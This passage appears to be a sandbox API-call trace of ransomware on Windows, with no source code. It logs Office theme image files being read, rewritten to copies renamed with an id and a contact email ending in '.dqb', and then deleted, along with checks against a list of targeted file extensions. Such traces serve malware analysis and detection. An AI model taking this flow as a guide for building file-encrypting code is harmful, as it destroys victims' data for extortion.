files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.546] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=33277) returned 1 [0043.546] CloseHandle (hObject=0x1dc) returned 1 [0043.546] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 0x20 [0043.546] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.546] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.547] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.547] GetLastError () returned 0x0 [0043.547] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x81fd, lpOverlapped=0x0) returned 1 [0043.549] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x8200, lpOverlapped=0x0) returned 1 [0043.550] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.551] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.551] SetEndOfFile (hFile=0x160) returned 1 [0043.551] CloseHandle (hObject=0x160) returned 1 [0043.551] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.551] SetEndOfFile (hFile=0x1dc) returned 1 [0043.552] CloseHandle (hObject=0x1dc) returned 1 [0043.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.552] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 1 [0043.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.552] lstrlenW (lpString=".doc") returned 4 [0043.552] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.552] lstrlenW (lpString=".docx") returned 5 [0043.552] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.552] lstrlenW (lpString=".pdf") returned 4 [0043.552] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.553] lstrlenW (lpString=".xls") returned 4 [0043.553] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.553] lstrlenW (lpString=".xlsx") returned 5 [0043.553] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.553] lstrlenW (lpString=".ppt") returned 4 [0043.553] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.553] lstrlenW (lpString=".zip") returned 4 [0043.553] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.553] lstrlenW (lpString=".rar") returned 4 [0043.553] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.553] lstrlenW (lpString=".bz2") returned 4 [0043.553] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.553] lstrlenW (lpString=".7z") returned 3 [0043.553] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.553] lstrlenW (lpString=".dbf") returned 4 [0043.553] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.553] lstrlenW (lpString=".1cd") returned 4 [0043.553] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.553] lstrlenW (lpString=".jpg") returned 4 [0043.553] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.553] lstrlenW (lpString=".doc") returned 4 [0043.553] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.553] lstrlenW (lpString=".docx") returned 5 [0043.553] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.553] lstrlenW (lpString=".pdf") returned 4 [0043.553] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.553] lstrlenW (lpString=".xls") returned 4 [0043.553] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.553] lstrlenW (lpString=".xlsx") returned 5 [0043.554] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.554] lstrlenW (lpString=".ppt") returned 4 [0043.554] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.554] lstrlenW (lpString=".zip") returned 4 [0043.554] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.554] lstrlenW (lpString=".rar") returned 4 [0043.554] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.554] lstrlenW (lpString=".bz2") returned 4 [0043.554] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.554] lstrlenW (lpString=".7z") returned 3 [0043.554] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.554] lstrlenW (lpString=".dbf") returned 4 [0043.554] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.554] lstrlenW (lpString=".1cd") returned 4 [0043.554] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0043.554] lstrlenW (lpString=".jpg") returned 4 [0043.554] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.554] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.554] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.555] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1453) returned 1 [0043.555] CloseHandle (hObject=0x1dc) returned 1 [0043.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 0x20 [0043.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0043.555] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.555] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0043.557] GetLastError () returned 0x0 [0043.557] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5ad, lpOverlapped=0x0) returned 1 [0043.558] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0043.559] ReadFile (in: hFile=0x1dc, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.559] WriteFile (in: hFile=0x160, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.559] SetEndOfFile (hFile=0x160) returned 1 [0043.559] CloseHandle (hObject=0x160) returned 1 [0043.560] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.560] SetEndOfFile (hFile=0x1dc) returned 1 [0043.560] CloseHandle (hObject=0x1dc) returned 1 [0043.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.561] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 1 [0043.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.561] lstrlenW (lpString=".doc") returned 4 [0043.561] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.561] lstrlenW (lpString=".docx") returned 5 [0043.561] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.561] lstrlenW (lpString=".pdf") returned 4 [0043.561] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.561] lstrlenW (lpString=".xls") returned 4 [0043.561] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.561] lstrlenW (lpString=".xlsx") returned 5 [0043.561] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.561] lstrlenW (lpString=".ppt") returned 4 [0043.561] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.561] lstrlenW (lpString=".zip") returned 4 [0043.561] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.561] lstrlenW (lpString=".rar") returned 4 [0043.561] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.561] lstrlenW (lpString=".bz2") returned 4 [0043.561] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.561] lstrlenW (lpString=".7z") returned 3 [0043.561] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.561] lstrlenW (lpString=".dbf") returned 4 [0043.561] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.561] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.561] lstrlenW (lpString=".1cd") returned 4 [0043.562] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.562] lstrlenW (lpString=".jpg") returned 4 [0043.562] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.562] lstrlenW (lpString=".doc") returned 4 [0043.562] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.562] lstrlenW (lpString=".docx") returned 5 [0043.562] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.562] lstrlenW (lpString=".pdf") returned 4 [0043.562] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.562] lstrlenW (lpString=".xls") returned 4 [0043.562] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.562] lstrlenW (lpString=".xlsx") returned 5 [0043.562] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.562] lstrlenW (lpString=".ppt") returned 4 [0043.562] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.562] lstrlenW (lpString=".zip") returned 4 [0043.562] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.562] lstrlenW (lpString=".rar") returned 4 [0043.562] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.562] lstrlenW (lpString=".bz2") returned 4 [0043.562] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.562] lstrlenW (lpString=".7z") returned 3 [0043.562] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.562] lstrlenW (lpString=".dbf") returned 4 [0043.562] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.562] lstrlenW (lpString=".1cd") returned 4 [0043.562] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.562] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0043.562] lstrlenW (lpString=".jpg") returned 4 [0043.768] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.783] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.785] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0043.793] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=32403) returned 1 [0043.793] CloseHandle (hObject=0x154) returned 1 [0043.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 0x20 [0043.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0043.794] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.794] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0043.794] GetLastError () returned 0x0 [0043.794] ReadFile (in: hFile=0x154, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x7e93, lpOverlapped=0x0) returned 1 [0043.796] WriteFile (in: hFile=0x168, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x7ea0, lpOverlapped=0x0) returned 1 [0043.797] ReadFile (in: hFile=0x154, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.797] WriteFile (in: hFile=0x168, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.797] SetEndOfFile (hFile=0x168) returned 1 [0043.797] CloseHandle (hObject=0x168) returned 1 [0043.797] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.798] SetEndOfFile (hFile=0x154) returned 1 [0043.798] CloseHandle (hObject=0x154) returned 1 [0043.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.799] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 1 [0043.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.799] lstrlenW (lpString=".doc") returned 4 [0043.799] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.799] lstrlenW (lpString=".docx") returned 5 [0043.799] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.799] lstrlenW (lpString=".pdf") returned 4 [0043.799] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.799] lstrlenW (lpString=".xls") returned 4 [0043.799] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.799] lstrlenW (lpString=".xlsx") returned 5 [0043.799] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.799] lstrlenW (lpString=".ppt") returned 4 [0043.799] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.799] lstrlenW (lpString=".zip") returned 4 [0043.799] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.799] lstrlenW (lpString=".rar") returned 4 [0043.799] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.799] lstrlenW (lpString=".bz2") returned 4 [0043.799] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.799] lstrlenW (lpString=".7z") returned 3 [0043.799] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.799] lstrlenW (lpString=".dbf") returned 4 [0043.799] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.799] lstrlenW (lpString=".1cd") returned 4 [0043.799] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.800] lstrlenW (lpString=".jpg") returned 4 [0043.800] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.800] lstrlenW (lpString=".doc") returned 4 [0043.800] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.800] lstrlenW (lpString=".docx") returned 5 [0043.800] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.800] lstrlenW (lpString=".pdf") returned 4 [0043.800] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.800] lstrlenW (lpString=".xls") returned 4 [0043.800] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.800] lstrlenW (lpString=".xlsx") returned 5 [0043.800] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.800] lstrlenW (lpString=".ppt") returned 4 [0043.800] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.800] lstrlenW (lpString=".zip") returned 4 [0043.800] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.800] lstrlenW (lpString=".rar") returned 4 [0043.800] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.800] lstrlenW (lpString=".bz2") returned 4 [0043.800] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.800] lstrlenW (lpString=".7z") returned 3 [0043.800] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.800] lstrlenW (lpString=".dbf") returned 4 [0043.800] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.800] lstrlenW (lpString=".1cd") returned 4 [0043.800] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0043.800] lstrlenW (lpString=".jpg") returned 4 [0043.800] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.801] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.801] lstrlenW (lpString="THMBNAIL.PNG") returned 12 